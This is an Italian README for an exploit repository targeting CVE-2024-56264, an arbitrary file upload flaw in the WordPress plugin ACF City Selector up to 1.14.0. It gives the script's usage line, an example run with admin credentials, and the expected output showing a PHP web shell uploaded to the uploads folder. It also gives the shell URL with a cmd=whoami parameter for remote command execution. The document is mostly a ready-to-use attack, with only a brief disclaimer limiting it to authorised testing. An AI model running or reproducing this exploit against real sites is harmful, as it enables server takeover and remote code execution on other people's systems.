
Exploit Python per CVE-2024-56264, una vulnerabilità di upload arbitrario di file nel plugin WordPress ACF City Selector <=1.14.0, che consente l'esecuzione remota di codice tramite upload di web shell.
Questo repository contiene un exploit per CVE-2024-56264, una vulnerabilità di Caricamento File Arbitrario presente nel plugin WordPress ACF City Selector (versioni <= 1.14.0). Questa vulnerabilità consente a un attaccante di caricare un file PHP malevolo (web shell) su un'istanza WordPress vulnerabile ed eseguire comandi arbitrari sul server.
<= 1.14.0Il plugin ACF City Selector non convalida correttamente i file caricati, permettendo agli attaccanti di aggirare le restrizioni e caricare file PHP arbitrari. Una volta caricato un file PHP malevolo, un attaccante può eseguire comandi di sistema da remoto, portando a un compromesso totale del server.
Assicurati che i seguenti siano installati prima di eseguire lo script:
requests (Installa usando: pip install requests)Puoi installare tutte le dipendenze richieste usando:
pip install -r requirements.txt
Eseguendo l'exploit:
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability
options:
-h, --help show this help message and exit
--url URL Website base URL (e.g., http://192.168.100.74/wordpress)
--username USERNAME WordPress username
--password PASSWORD WordPress password
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
In caso di sfruttamento riuscito, dovresti vedere:
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php
In caso di successo, accedi alla shell caricata tramite:
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
Questo consente l'esecuzione di comandi remoti sul server.
Questo script è destinato solo a scopi educativi e di test di sicurezza autorizzati. L'uso non autorizzato è illegale e può comportare gravi conseguenze. L'autore non è responsabile per qualsiasi uso improprio di questo exploit.